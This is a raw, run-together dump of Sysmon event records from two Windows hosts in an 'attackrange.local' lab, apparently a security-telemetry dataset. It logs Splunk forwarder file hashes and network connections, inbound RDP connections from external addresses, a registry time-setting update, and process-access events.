Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471E1674FEF6E42B2B1B682823642FBB,SHA256=CA530815B3570849AFE7265E415297E6B1C1AC65400D0E02D157C83BE9CBA199,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981742Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:09.902{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49430-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981741Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:09.859{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59568-false10.0.1.12-8000- 23542300x8000000000000000981740Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:13.018{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EE19A7C9757B311F0868AC1A78795BC,SHA256=07F193E0A216F5E4C2A149C9FE501326B9F97EE6EB51EF7F6845EB719BD7F759,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:14.153{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F9DD2B26911B745A8EC4B8506BE58CA,SHA256=834BCCEB47AC58C0C7DAC80C9214BCCB59756A0D0AB89A70B40DC63EA8499A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981745Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:14.346{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2AF20A58F5FE4F83535A416096EB138,SHA256=0E486B405C47C0EE95ACCC61B4DEA6E6B65842DB518375CB7A99D01F48B8EDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981744Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:14.065{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7D425F13CD69720E867BBB8923F77D7,SHA256=86B4ED65E5AFD92DBF5ABE87FB2C1D010753E772F1D934CF303BF99667E02E85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981743Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:14.003{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:15.606{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:15.153{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEF71395D055A2FCF6F171F03AE02F7C,SHA256=D19558B8A3FB8540850D99270B10D61D8E87EFA386A9BD0AB2650F58103CDD80,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981747Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:11.342{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50299-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981746Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:15.081{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE43D4568B861A6DD4A805852685104,SHA256=2B933D3974F5E3013D1B93E42F728974EF49A81F331229E21FBEF45EA56E5627,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981749Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:16.300{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD7708AC1FC815177FE6B47E9601FB3,SHA256=85DF5E9B2BDDD6281479097897768B6429CEEE2EC66C782BB1CC43DB3CFF7D21,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:15.136{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58452-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:16.497{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52A408FA267D0E2F5913BF9AD8480115,SHA256=28D769B5805B0A1E2E5568FADE430FB267366709961911532F84ACC5FA7012B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:16.497{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=099CC6C68E58CB0C771036139386933D,SHA256=D412E37BDA88FD7881CA3D3DFD5FE4CF2FDE9E8721805D08995A254D0F925582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:16.153{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=877DA9E90386556B3E1A76355770756B,SHA256=92F67DF877C1E32C7AE4838D847BC992BD3307B0146460169B2A673D84778C14,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981748Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:12.624{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59569-false10.0.1.12-8089- 23542300x8000000000000000981750Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:17.534{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69AF4D22DC56C17BF4F925CF840D79EE,SHA256=AE62FFC31D58A4A662139CE19FBC0E084B8902A0057BAFF0F904EF915F4DAA55,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:16.121{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52660-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:15.532{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54291-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001057415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:17.512{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52A408FA267D0E2F5913BF9AD8480115,SHA256=28D769B5805B0A1E2E5568FADE430FB267366709961911532F84ACC5FA7012B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:17.184{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44AC6D6E14B241CF0A5E1150756DD708,SHA256=8168B3112B70A516EC9833B20A0740B01EBFA0DF6AF7972AA040C0FD677741E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981752Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:18.956{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20694F70A04797533E5C5D00D4A1DEEF,SHA256=51482E2E4C0085ABB5164BF97E53FBB8BAA6AECBE081F085874AA278D160815A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981751Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:18.550{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67F21F81CEF7361012AB43EAB96F37EB,SHA256=525C117DCE4E491D3CE5217268DDA274749EC4D2BF8D03B56DC3319D98E03D93,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:17.048{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54292-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:18.309{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C645C5DFCBCCA13305E40D212BF41F4,SHA256=B6E4BE394014568C2FE97BEEDF28E89F1D6D3A23DF830F3BEFB9E0A7CED3FE5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981755Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:19.784{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82307DD19750AC89D100E1B0B7FDAFB,SHA256=DD21C7145197AA796D33EDEB2C9F7255AEF93A95345B717AACC90ABCBFC83E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:19.388{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B268E5F1B321EE5435CA23B7ACEA463,SHA256=367A01CE8850091B2EB35EADCC725106ED4745DD776ECB9C3C9564DEBBD35C8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981754Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:16.113{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de53591-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981753Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:15.796{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59570-false10.0.1.12-8000- 23542300x8000000000000000981757Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:20.940{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECB67DBE0FE55DE834261B90189E5431,SHA256=FB0860F8060BC43880A9D086D018EC77DE191299C5FE4EF470A145B8C890D07F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981756Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:20.909{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BB7D5A817CA565D84075D75AAE1A5D8,SHA256=834FD7C0EF82685E13533D23AE8B26612907B9D72F33A2B6FE5033F4EDB47EC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:20.622{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71BE7F31724AED7C3AA59F8303F51CF1,SHA256=808FC68B0E3FFDDAA12817574AA848ED1B1407A915FC57228A64AF371FE8B982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:21.856{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7056529B7E49D5EEBFE0AA4687E5FCBE,SHA256=DF98C8D8518DC407761000EA246A37BCACAE261A4AD5F49F21EEAC9EF8E46E30,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981758Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:18.277{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-52890-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:22.856{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6403333344AC955BDCA3702CBD7D0B11,SHA256=0D0AE317D1AB89A05FD9514DB4ACFD812DAD452816621213A44CFD6D67802065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981759Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:22.018{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=180A254C655EAE9CECE520920B8C3A8A,SHA256=5B45338283B29387337A1FA39A07E5A49B78D97AE4AF5E3980FBCF6912063E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981762Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:23.613{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2FB4C7DA3FD512FED27B18785135D38,SHA256=31F1DE81D3659C490586A6C45850AA52D974F8CA1C62BED3C60E4526528B37F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981761Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:20.318{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com22553-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981760Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:23.065{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3542547998006573C4D4DC30F81998,SHA256=8F1E272639F5C63D7D3220627EDD7D325B4C4D494D9BBC568EA0C14F2C1E8E3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:23.385{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57231-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:23.048{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54293-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x80000000000000001057425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:26:24.403{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0xbd9cc728) 23542300x80000000000000001057424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:24.075{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D51AFC0466407B5BB5C971964AD7406,SHA256=12C27EEBC6879BDCB40360DB5CECE4E4526AE536F5424ECCE696E656A9C259AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981765Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:21.357{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63798-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981764Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:20.812{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59571-false10.0.1.12-8000- 23542300x8000000000000000981763Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:24.301{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F9DDF671C093B8790167CC2B47C22DB,SHA256=F8E5295FCA02E9F4475C71D77E7FFB2D65136533DAD7D1F34F0240DE40292203,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981781Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.849{69CF5F33-8E41-6151-297A-00000000FD01}7083040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981780Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E41-6151-297A-00000000FD01}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981779Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981778Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981777Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981776Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 